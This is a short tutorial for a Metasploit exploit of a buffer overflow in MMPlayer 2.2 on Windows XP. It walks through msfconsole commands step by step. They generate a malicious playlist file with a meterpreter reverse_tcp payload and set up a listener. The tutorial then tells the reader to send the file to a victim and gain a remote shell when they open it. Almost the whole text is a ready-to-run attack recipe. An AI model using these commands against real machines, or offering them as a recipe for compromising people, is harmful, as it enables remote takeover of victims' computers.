This module exploits a buffer overflow in MMPlayer 2.2 the vulnerability is triggered when opening a malformed M3U/PPL file that contains an overly long string, which results in overwriting a SEH record, thus allowing arbitrary code execution under the context of the user.
Exploit Targets
MMPlayer 2.2
Windows XP SP 2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof
Msf exploit (tfm_mmplayer_m3u_ppl_bof)>set payload windows/meterpreter/reverse_tcp
Msf exploit (tfm_mmplayer_m3u_ppl_bof)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (tfm_mmplayer_m3u_ppl_bof)>set srvhost 192.168.1.2
Msf exploit (tfm_mmplayer_m3u_ppl_bof)>exploit
After we successfully generate the malicious ZIP File, it will stored on your local computer
/root/.msf4/local/msf.ppl
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
Now send your msf.ppl files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.